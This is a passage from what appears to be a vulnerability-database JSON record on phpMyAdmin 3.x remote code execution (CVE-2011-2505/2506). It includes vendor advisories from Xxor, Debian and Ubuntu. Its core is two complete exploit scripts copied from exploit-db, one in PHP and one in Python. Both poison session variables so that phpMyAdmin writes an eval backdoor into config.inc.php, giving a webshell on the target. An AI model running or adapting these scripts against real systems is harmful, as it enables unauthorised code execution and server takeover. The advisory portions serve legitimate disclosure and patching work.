\n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/102908/phpmyadmin3-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "PMA3 rce\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2012-01-26T00:00:00", "type": "dsquare", "title": "Phpmyadmin 3.x RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2013-04-02T00:00:00", "id": "E-15", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-12-02T16:52:56", "description": "", "cvss3": {}, "published": "2011-07-09T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 3.x - Swekey Remote Code Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2011-2505", "2011-2506", "CVE-2011-2505", "CVE-2011-2506"], "modified": 
"2011-07-09T00:00:00", "id": "EDB-ID:17514", "href": "https://www.exploit-db.com/exploits/17514", "sourceData": "<?php /*\r\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\r\n# Date: 2011-07-09\r\n# Author: Mango of ha.xxor.se\r\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 \r\n# CVE : CVE-2011-2505, CVE-2011-2506\r\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\r\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n*/\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n .\r\n , )\\ .\r\n . ,/) , / ) , )\\\r\n )\\( /)/( (__( /( / ) __ __ ________ __ __\r\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\r\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\r\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\r\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\r\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \r\n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\r\n Remote Code Injection [] [][] [] [] [] [] [] []\r\n http://ha.xxor.se [][] [] [] [] [][] [][] [] [] \r\n\t _ _ ___ __ ____ __ ___ ___ \r\n\t| |-| || _ |\\ /\\ /| _ || ) \r\n\t|_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \r\n ___ ___ ___ _ _ ___ ___ __ __ \r\n ( < | [_ / /| || || )(_)| |\\ | /\r\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\r\n\r\nUse responsibly.\r\n\r\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\r\n\r\nif(php_sapi_name()==='cli'){\r\n\tif(!isset($argv[1])){\r\n\t\toutput(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\");\r\n\t\tkillme();\r\n\t}\r\n\t$pmaurl = $argv[1];\t\r\n}else{\r\n\t$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\r\n}\r\n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);';\r\n$cookie = null;\r\n$token = 
null;\r\nif(!function_exists('curl_init')){\r\n\toutput('[!] Fatal error. Need cURL!');\r\n\tkillme();\r\n}\r\n$ch = curl_init();\r\n$debug = 0;\r\nif(php_sapi_name()!=='cli'){\r\n?>\r\n<form method=post>\r\nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\r\n<input name=submit type=submit value=\u2665>\r\n</form>\r\n<pre>\r\n<?php\r\nif(!isset($_REQUEST['submit']))killme(true);\r\n}\r\n\r\noutput(\"[i] Running...\");\r\n\r\n// Start a session and get a token\r\ncurl_setopt_array($ch, array(\r\n\tCURLOPT_URL => $pmaurl.'/setup/index.php',\r\n\tCURLOPT_HEADER => 1,\r\n\tCURLOPT_RETURNTRANSFER => 1,\r\n\tCURLOPT_TIMEOUT => 4,\r\n\tCURLOPT_SSL_VERIFYPEER => false,\r\n\tCURLOPT_SSL_VERIFYHOST => false\r\n));\r\noutput(\"[*] Contacting server to retrive session cookie and token.\");\r\n\r\n$result = curl_exec($ch);\r\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\r\n\toutput(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\");\r\n\tkillme();\r\n}\r\nif(!$result){\r\n\toutput(\"[!] cURL error:\".curl_error($ch));\r\n\tkillme();\r\n}\r\nif(false !== strpos($result, 'Cannot load or save configuration')){\r\n\toutput(\"[!] Fail. Host not vulnerable. 
Web server writable folder $pmaurl/config/ does not exsist.\");\r\n\tkillme();\r\n}\r\n\r\n// Extract cookie\r\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\r\n$cookie = $matches[1];\r\noutput(\"[i] Cookie:\".$cookie);\r\n// Extract token\r\npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches);\r\n$token = $matches[2];\r\noutput(\"[i] Token:\".$token);\r\n\r\n// Poison _SESSION variable\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\r\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\r\noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\");\r\nif(!$result = curl_exec($ch)){\r\n\toutput(\"[!] cURL error:\".curl_error($ch));\r\n\tkillme();\r\n}\r\n\r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n\r\n// Save file\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\r\ncurl_setopt($ch, CURLOPT_POST, 1);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\r\noutput(\"[*] Contacting server to make it save the injected code to a file.\");\r\nif(!$result = curl_exec($ch)){\r\n\toutput(\"[!] cURL error:\".curl_error($ch));\r\n\tkillme();\r\n}\r\n\r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\r\ncurl_setopt($ch, CURLOPT_POST, 0);\r\noutput(\"[*] Contacting server to test if the injected code executes.\");\r\nif(!$result = curl_exec($ch)){\r\n\toutput(\"[!] cURL error:\".curl_error($ch));\r\n\tkillme();\r\n}\r\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\r\n\toutput(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\");\r\n\toutput(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\");\r\n}else{\r\n\toutput(\"[!] Code injection failed. 
This instance of phpMyAdmin does not apear to be vulnerable.\");\r\n}\r\n\r\n\r\ncurl_close($ch);\r\n\r\nfunction output($msg){\r\n\techo php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\";\r\n\tflush();\r\n}\r\n\r\nfunction killme(){\r\n\toutput(\"[*] Exiting...\");\r\n\techo php_sapi_name()!=='cli'?'<pre>':'';\r\n\tdie();\r\n}\r\n\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>", "sourceHref": "https://www.exploit-db.com/raw/17514", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:52:57", "description": "", "cvss3": {}, "published": "2011-07-08T00:00:00", "type": "exploitdb", "title": "phpMyAdmin3 (pma3) - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2011-2505", "2011-2506", "CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-08T00:00:00", "id": "EDB-ID:17510", "href": "https://www.exploit-db.com/exploits/17510", "sourceData": "#!/usr/bin/env python\r\n# coding=utf-8\r\n# pma3 - phpMyAdmin3 remote code execute exploit\r\n# Author: wofeiwo<wofeiwo@80sec.com>\r\n# Thx Superhei\r\n# Tested on: 3.1.1, 3.2.1, 3.4.3\r\n# CVE: CVE-2011-2505, CVE-2011-2506\r\n# Date: 2011-07-08\r\n# Have fun, DO *NOT* USE IT TO DO BAD THING.\r\n################################################\r\n\r\n# Requirements: 1. \"config\" directory must created&writeable in pma directory.\r\n# 2. 
session.auto_start = 1 in php.ini configuration.\r\n\r\n\r\nimport os,sys,urllib2,re\r\n\r\ndef usage(program):\r\n print \"PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code\r\nexecute exploit\"\r\n print \"Usage: %s <PMA_url>\" % program\r\n print \"Example: %s http://www.test.com/phpMyAdmin\" % program\r\n sys.exit(0)\r\n\r\ndef main(args):\r\n try:\r\n if len(args) < 2:\r\n usage(args[0])\r\n\r\n if args[1][-1] == \"/\":\r\n args[1] = args[1][:-1]\r\n\r\n print \"[+] Trying get form token&session_id..\"\r\n content = urllib2.urlopen(args[1]+\"/index.php\").read()\r\n r1 = re.findall(\"token=(\\w{32})\", content)\r\n r2 = re.findall(\"phpMyAdmin=(\\w{32,40})\", content)\r\n\r\n if not r1:\r\n r1 = re.findall(\"token\\\" value=\\\"(\\w{32})\\\"\", content)\r\n if not r2:\r\n r2 = re.findall(\"phpMyAdmin\\\" value=\\\"(\\w{32,40})\\\"\", content)\r\n if len(r1) < 1 or len(r2) < 1:\r\n print \"[-] Cannot find form token and session id...exit.\"\r\n sys.exit(-1)\r\n\r\n token = r1[0]\r\n sessionid = r2[0]\r\n print \"[+] Token: %s , SessionID: %s\" % (token, sessionid)\r\n\r\n print \"[+] Trying to insert payload in $_SESSION..\"\r\n uri = \"/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA\"\r\n url = args[1]+uri\r\n\r\n opener = urllib2.build_opener()\r\n opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;\r\npma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %\r\n(sessionid, sessionid)))\r\n urllib2.install_opener(opener)\r\n 
urllib2.urlopen(url)\r\n\r\n print \"[+] Trying get webshell..\"\r\n postdata =\r\n\"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save\"\r\n% (sessionid, token)\r\n url = args[1]+\"/setup/config.php\"\r\n\r\n # print \"[+]Postdata: %s\" % postdata\r\n urllib2.urlopen(url, postdata)\r\n print \"[+] All done, pray for your lucky!\"\r\n\r\n url = args[1]+\"/config/config.inc.php\"\r\n opener.addheaders.append(('Code', 'phpinfo();'))\r\n urllib2.install_opener(opener)\r\n print \"[+] Trying connect shell: %s\" % url\r\n result = re.findall(\"System \\</td\\>\\<td\r\nclass=\\\"v\\\"\\>(.*)\\</td\\>\\</tr\\>\", urllib2.urlopen(url).read())\r\n if len(result) == 1:\r\n print \"[+] Lucky u! System info: %s\" % result[0]\r\n print \"[+] Shellcode is: eval(getenv('HTTP_CODE'));\"\r\n\r\n else:\r\n print \"[-] Cannot get webshell.\"\r\n\r\n except Exception, e:\r\n print e\r\n\r\nif __name__ == \"__main__\" : main(sys.argv)", "sourceHref": "https://www.exploit-db.com/raw/17510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T18:56:03", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "cvss3": {}, "published": "2011-07-13T00:00:00", "type": "securityvulns", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2011-07-13T00:00:00", "id": "SECURITYVULNS:VULN:11785", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11785", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, 
{"lastseen": "2021-06-08T19:08:47", "description": "phar extension information leaks, SPLObjectStorage information leaks, error messages information leaks, variables spoofing.", "cvss3": {}, "published": "2010-09-27T00:00:00", "type": "securityvulns", "title": "PHP multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-2225", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-2950"], "modified": "2010-09-27T00:00:00", "id": "SECURITYVULNS:VULN:11165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11165", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:41", "description": "#######################################################################################\r\n\r\n phpMyAdmin 3.x Multiple Remote Code Executions\r\n\r\n###################################[ Advisory from\r\n]###################################\r\n\r\n
####################################[ www.Xxor.se\r\n]####################################\r\n\r\nApplication: phpMyAdmin 3.x\r\nPatched ver: 3.3.10.2 and 3.4.3.1\r\nSeverity: High\r\nExploitable: Remote\r\n\r\n#######################################[ Bug 1\r\n]#######################################\r\nA remote variable manipulation vulnerability affecting the superglobal session\r\nvariables that opens up a broad path to other vulnerabilities.\r\n\r\nCVE ID: CVE-2011-2505\r\nPMASA ID: PMASA-2011-5\r\n\r\n#######################################[ Bug 2\r\n]#######################################\r\nA remote attacker in control of the superglobal session variables can inject\r\narbitrary PHP code into a configuration file via an unsanitized key.\r\n\r\nCVE ID: CVE-2011-2506\r\nPMASA ID: PMASA-2011-6\r\n\r\n#######################################[ Bug 3\r\n]#######################################\r\nAn authenticated remote attacker in control of the superglobal session variables\r\ncan inject and execute arbitrary PHP code in PHP function preg_replace.\r\n\r\nCVE ID: CVE-2011-2507\r\nPMASA ID: PMASA-2011-7\r\n\r\n#######################################[ Bug 4\r\n]#######################################\r\nAn authenticated remote attacker can use a directory traversal\r\nvulnerability to include\r\nand execute an arbitrary local file.\r\n\r\nCVE ID: CVE-2011-2508\r\nPMASA ID: PMASA-2011-8\r\n\r\n########################################[ Fix\r\n]########################################\r\n\r\nUpgrade to version 3.3.10.2 or 3.4.3.1.\r\nOr apply patches available at: http://www.phpmyadmin.net/home_page/security/\r\n\r\n#####################################[ Timeline\r\n]######################################\r\n\r\n2011-06-28 - Contacted vendor\r\n2011-06-28 - Vendor responded\r\n2011-06-28 - Sent Details and Suggested Patches to vendor\r\n2011-07-02 - Vulnerabilities 
fixed\r\n2011-07-07 - Disclosed\r\n\r\n###############################[ Detailed Description\r\n]################################\r\n\r\nhttp://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n\r\n#######################################################################################", "cvss3": {}, "published": "2011-07-13T00:00:00", "type": "securityvulns", "title": "phpMyAdmin 3.x Multiple Remote Code Executions", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2011-07-13T00:00:00", "id": "SECURITYVULNS:DOC:26645", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26645", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:41", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2286-1 security@debian.org\r\nhttp://www.debian.org/security/ Thijs Kinkhorst\r\nJuly 26, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : phpymadmin\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-2505 CVE-2011-2506 CVE-2011-2507\r\n CVE-2011-2508 CVE-2011-2642\r\n\r\nSeveral vulnerabilities were discovered in phpMyAdmin, a tool to\r\nadministrate MySQL over the web. 
The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2011-2505\r\n\r\n Possible session manipulation in Swekey authentication.\r\n\r\nCVE-2011-2506\r\n\r\n Possible code injection in setup script, in case session\r\n variables are compromised.\r\n\r\nCVE-2011-2507\r\n\r\n Regular expression quoting issue in Synchronize code.\r\n\r\nCVE-2011-2508\r\n\r\n Possible directory traversal in MIME-type transformation.\r\n\r\nCVE-2011-2642\r\n\r\n Cross site scripting in table Print view when the attacker can\r\n create crafted table names.\r\n\r\nNo CVE name yet\r\n\r\n Possible superglobal and local variables manipulation in\r\n Swekey authentication. (PMASA-2011-12)\r\n\r\nThe oldstable distribution (lenny) is only affected by CVE-2011-2642,\r\nwhich has been fixed in version 2.11.8.1-5+lenny9.\r\n\r\nFor the stable distribution (squeeze), these problems have been fixed\r\nin version 3.3.7-6.\r\n\r\nFor the testing distribution (wheezy) and unstable distribution (sid),\r\nthese problems have been fixed in version 3.4.3.2-1.\r\n\r\nWe recommend that you upgrade your phpymadmin packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2011-08-01T00:00:00", "type": "securityvulns", 
"title": "[SECURITY] [DSA 2286-1] phpmyadmin security update", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26749", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26749", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:36", "description": "===========================================================\r\nUbuntu Security Notice USN-989-1 September 20, 2010\r\nphp5 vulnerabilities\r\nCVE-2010-0397, CVE-2010-1128, CVE-2010-1129, CVE-2010-1130,\r\nCVE-2010-1866, CVE-2010-1868, CVE-2010-1917, CVE-2010-2094,\r\nCVE-2010-2225, CVE-2010-2531, CVE-2010-2950, CVE-2010-3065\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 9.04\r\nUbuntu 9.10\r\nUbuntu 10.04 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n libapache2-mod-php5 5.1.2-1ubuntu3.19\r\n php5-cgi 5.1.2-1ubuntu3.19\r\n php5-cli 5.1.2-1ubuntu3.19\r\n\r\nUbuntu 8.04 LTS:\r\n libapache2-mod-php5 5.2.4-2ubuntu5.12\r\n php5-cgi 5.2.4-2ubuntu5.12\r\n php5-cli 5.2.4-2ubuntu5.12\r\n\r\nUbuntu 9.04:\r\n libapache2-mod-php5 5.2.6.dfsg.1-3ubuntu4.6\r\n php5-cgi 5.2.6.dfsg.1-3ubuntu4.6\r\n php5-cli 5.2.6.dfsg.1-3ubuntu4.6\r\n\r\nUbuntu 9.10:\r\n libapache2-mod-php5 5.2.10.dfsg.1-2ubuntu6.5\r\n php5-cgi 5.2.10.dfsg.1-2ubuntu6.5\r\n php5-cli 5.2.10.dfsg.1-2ubuntu6.5\r\n\r\nUbuntu 10.04 LTS:\r\n libapache2-mod-php5 5.3.2-1ubuntu4.5\r\n php5-cgi 5.3.2-1ubuntu4.5\r\n php5-cli 5.3.2-1ubuntu4.5\r\n\r\nIn general, a standard system update will make all the 
necessary changes.\r\n\r\nDetails follow:\r\n\r\nAuke van Slooten discovered that PHP incorrectly handled certain xmlrpc\r\nrequests. An attacker could exploit this issue to cause the PHP server to\r\ncrash, resulting in a denial of service. This issue only affected Ubuntu\r\n6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\r\n\r\nIt was discovered that the pseudorandom number generator in PHP did not\r\nprovide the expected entropy. An attacker could exploit this issue to\r\npredict values that were intended to be random, such as session cookies.\r\nThis issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10.\r\n(CVE-2010-1128)\r\n\r\nIt was discovered that PHP did not properly handle directory pathnames that\r\nlacked a trailing slash character. An attacker could exploit this issue to\r\nbypass safe_mode restrictions. This issue only affected Ubuntu 6.06 LTS,\r\n8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\r\n\r\nGrzegorz Stachowiak discovered that the PHP session extension did not\r\nproperly handle semicolon characters. An attacker could exploit this issue\r\nto bypass safe_mode restrictions. This issue only affected Ubuntu 8.04 LTS,\r\n9.04 and 9.10. (CVE-2010-1130)\r\n\r\nStefan Esser discovered that PHP incorrectly decoded remote HTTP chunked\r\nencoding streams. An attacker could exploit this issue to cause the PHP\r\nserver to crash and possibly execute arbitrary code with application\r\nprivileges. This issue only affected Ubuntu 10.04 LTS. (CVE-2010-1866)\r\n\r\nMateusz Kocielski discovered that certain PHP SQLite functions incorrectly\r\nhandled empty SQL queries. An attacker could exploit this issue to possibly\r\nexecute arbitrary code with application privileges. (CVE-2010-1868)\r\n\r\nMateusz Kocielski discovered that PHP incorrectly handled certain arguments\r\nto the fnmatch function. An attacker could exploit this flaw and cause the\r\nPHP server to consume all available stack memory, resulting in a denial of\r\nservice. 
(CVE-2010-1917)\r\n\r\nStefan Esser discovered that PHP incorrectly handled certain strings in the\r\nphar extension. An attacker could exploit this flaw to possibly view\r\nsensitive information. This issue only affected Ubuntu 10.04 LTS.\r\n(CVE-2010-2094, CVE-2010-2950)\r\n\r\nStefan Esser discovered that PHP incorrectly handled deserialization of\r\nSPLObjectStorage objects. A remote attacker could exploit this issue to\r\nview sensitive information and possibly execute arbitrary code with\r\napplication privileges. This issue only affected Ubuntu 8.04 LTS, 9.04,\r\n9.10 and 10.04 LTS. (CVE-2010-2225)\r\n\r\nIt was discovered that PHP incorrectly filtered error messages when limits\r\nfor memory, execution time, or recursion were exceeded. A remote attacker\r\ncould exploit this issue to possibly view sensitive information.\r\n(CVE-2010-2531)\r\n\r\nStefan Esser discovered that the PHP session serializer incorrectly handled\r\nthe PS_UNDEF_MARKER marker. An attacker could exploit this issue to alter\r\narbitrary session variables. 
(CVE-2010-3065)\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.19.diff.gz\r\n Size/MD5: 154712 14c7d4eaa9a2c9554cb6d69e675a150c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.19.dsc\r\n Size/MD5: 1777 4e521b0cdf30fc3e1b1be7aa51df4b5e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz\r\n Size/MD5: 8064193 b5b6564e8c6a0d5bc1d2b4787480d792\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.2-1ubuntu3.19_all.deb\r\n Size/MD5: 301962 3cb291e132c25fc31909b90870d95495\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.19_all.deb\r\n Size/MD5: 1032 867de9a55e534155332eb0b0094c908d\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 2437844 7c64ead91afbb66fc06f2f6088fb58de\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 4761528 26e723dbf705b98fc3fb68bd6fd5df26\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 2393068 15186c32173e5261e9efcbb4b414b8dd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 137602 584f45c3add7583046c7b32ff48850d8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 24612 e13be5485c4b96e9aa53c3e6cd171868\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 312640 0813d054f70e6a98d162f82363f2ae52\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 36844 cc14b2ee60e208578620b1d13674f188\r\n 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 22132 8b5cffd446ad1746e3b84a2c51c3a0f9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 8788 fbe8a927dec32c4a4f4fc2fcb50c46e2\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 25230 4de41ebe72a3a3d4b1a488c61c356ff3\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 43900 34e693db2e40cfe651e59260827503a4\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 30130 a84aec2b4d180ab273436c66f65a6c44\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 44386 26d3c30b7b0aa2e12aebb35e45edda7b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 8342 d3753ab04597e331102fa9c2d4595a91\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 15302 9091a1906ea3e51541d519e81dae8b04\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 29172 56539adab2886fb4b62bf8712cb76573\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 22698 2fcdca51baa5b06f3b14640468c8f198\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 42384 9a5de31b66863c550c7f0eabbbb15b59\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 16388 